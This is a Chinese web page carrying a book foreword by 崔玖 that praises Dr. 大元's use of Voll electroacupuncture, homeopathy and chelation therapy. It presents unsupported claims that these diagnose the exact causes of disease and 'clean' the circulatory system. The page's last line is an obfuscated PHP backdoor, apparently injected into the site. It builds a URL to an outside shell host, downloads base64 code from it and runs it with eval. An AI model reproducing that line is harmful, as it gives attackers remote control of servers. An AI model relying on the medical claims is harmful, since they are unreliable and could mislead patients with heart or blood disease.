收藏本站
推薦序 列印 E-mail
文章索引
推薦序
頁 2
頁 3
頁 4
頁 5
頁 6
頁 7
頁 8

濟世救人及無私精神

崔 玖 國際醫學科學研究基金會 祕書長

他把所有熟知的”武林秘笈”都詳列出來,鼓勵大家試 用,這種對學術的奉獻、濟世救人及無私的精神,是極難能可貴的。

初識大元醫師是在民國八十二年左右,當時正是他在 省立雲林醫院、熱衷於學習中醫的時代。經過榮總的針灸 訓練後,他更熱心的遠渡重洋,從我在夏威夷研究並開發 傅爾電針的夥伴──弗來德.蘭姆(林)醫師那裏,見習了 傅爾電針、同類療法及其精粹集成的藥物測試法。所以當 我們年後有機會見面細談的時候,他已津津有味的談論他 在雲林醫院門診處看病時解決不了的〝疑難雜症〞,都能 在與病家結為朋友之後,在家裡免費運用傅爾電針這一套 系統,補充了白天開的西藥之不足。不幸的是,這種愛護 患者並努力鑽研新療法的舉動,竟引起了院方的誤會,還 受到警告。

當時這席話給我的印象極深,因為早在七十六年我第二次由美國回國,就是因為應聘為國立陽明醫院客座教 授,負責籌設開辦傳統醫藥學研究所,為中西醫整合盡 力。當時的牽線人是提倡以電子工業帶領企業界起飛的國 內經濟大老李國鼎政務委員,他因為在檀香山看到我正在 試驗的〝傅爾電針〞系統──那是用電子儀器在中醫經絡 系統的穴位上,測出患者確切病因、病源的一種方式;他 親身受測的經驗,印證了測試結果竟與他出國前才在台北 榮民總醫院三天體檢的結果完全相符,包括西醫必須要用X 光顯影劑才看得出來的〝大腸憩室〞,也竟然在手指上的 大腸穴檢測出來;因此他熱心的為我安排一切,讓我能回 到十八年前我第一次回國就參與了的陽明大學榮民總醫院 團隊。十八年前我帶回來婦幼保健家庭計畫的新觀念,但 卻學到了針灸的奧妙。

在後來回到美國的十四年中,我帶出來的針灸研究, 幫助夏威夷州成為全美第二個針灸合法化的先進州。在不 斷的研究過程中,又得到德國傅爾醫師二度親臨培訓的 機會,使夏威夷成為傅爾電針在德國境外少有的幾個研習 地,進而成為由傅爾電針學理及實踐所研發〝生物能訊息
醫學〞的發源地。這就是為什麼大元醫師能夠具體的在那兒、在短時間內窺見這套醫學系統原貌的主因。

事實上在我回台後已快十年的經歷中,真正能得心應 手用到病人身上的西醫還真不多見。所以民國八十七年, 我禮聘到三軍總醫院剛退休的核子醫學部主任陳維廉醫 師,來主持我們基金會為臨床觀察所設的圓山診所時,他 代我也邀請了大元醫師,我真是欣喜萬分!因為我的理想 中,還真是樂見一般在社區中執業的學院派醫師,在日常 的業務中能真正整合中西醫、傳統與現代醫學,從基層就 能解決現代醫療上許多解不開的瓶頸。可惜我組織的圓山 診所當時限於基金會的規格,也只能用〝研究計畫〞來刻 板的執行一些有限的服務。一年後,陳、劉二位醫師都轉 向了另外的空間發展,但是因為同屬於〝另類〞服務,不 時還能聽到大元醫師在各種另類研究中的宏論;直到看到 本書的初稿,更讓我耳目一新,從心裡讚賞他的用心良苦 和鍥而不捨的努力。

細讀之後,發現這本書有許多特點:本書是以故事性 敘述個案報告為主,尤其最重要的病源及治療方式,皆是 以作者自身及家人的親身經驗來報導,兼具了醫者及病家 兩方的立場,自然生動且易取信。在本書中算是〝主軸〞 的病,又正是佔台灣及世界多數國家十大死因第二名的心 臟血管病變。大元自己接受了心導管和支架的手術,父親中過風後,又得了免疫功能異常所致的高白血球症,連同哥哥也得了溶血性的貧血;這些病的需要,促使他運用〝另類醫學〞中另一項重要的武器「螯合療法」。在本書 中,他特別介紹這個做為基本〝清洗循環系統〞的主將, 也是補充所有營養素的最速管道。事實上早在民國八十一 年,我們的基金會就請了在美國推行螯合療法最有力的艾 默爾.寬登(Elmen Granton)醫師(再見吧!心臟繞道手術書 之作者)來台,為圓山診所制定了螯合療法的施行辦法;而 在推行的那兩年也確實有不少顯著的業績,但終因成本太 貴而終止。

見到大元醫師單槍匹馬堅持這種療法,還能不斷地改 良作法,使其成為更簡易可行、安全而副作用少的良方; 更能以〝清洗水溝汙泥〞的理論,說服心生疑慮的患者 去接受它。這處方事實上是結合了中醫〝去邪扶正〞的原 理,而與西醫螯合重金屬、排毒及營養療法與幹細胞理論 的結合重組,再以有療效的實例來證實他的理論。

擁著傅爾電針系統、同類療法製劑,大元醫師得以縱 橫於所有〝另類療法 〞的領域,去定性定量的找出適於 患者的治療工具及藥物;在螯合清毒後的新組織系統上, 培養免疫功能,達到患者身心環境平衡的效果。這樣的醫 療如何不會成功呢?大元醫師在他每一個成功的病案敘述 中,都周到的加入了他對病情的解釋及治療的原則,更趁機介紹了中西醫對病案的理論基礎。最後提到〝推薦〞的師、友、患者群,從他們所寫的字裡行間,我看到大元醫師的努力已經得到真正「醫療工 作者」的矚目及肯定。我還得指出他可貴的熱誠,他在後 段的附錄中,把他所有熟知的〝武林秘笈〞都清楚地列了 出來,鼓勵大家去試用,這種對學術的奉獻、濟世救人及 無私的精神,是極為難能可貴的。願介紹給所有有心在醫 療上求新求進的醫療工作者,希望大家都有機會仔細閱讀 這本難得的好書。



崔 玖 簡介

學經歷:

‧國立上海醫學院、國防醫學院(借讀)醫學士
‧美國賓州大學醫學院醫學科學碩士
‧榮總婦幼中心主任
‧國立陽明大學傳統醫學研究所所長
‧美國賓州、紐約州、夏威夷州等醫院主治醫師


現職:

‧國際醫學科學研究基金會祕書長
‧夏威夷大學公共衛生學院醫學院永久教授
‧新圓山診所負責人



 
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));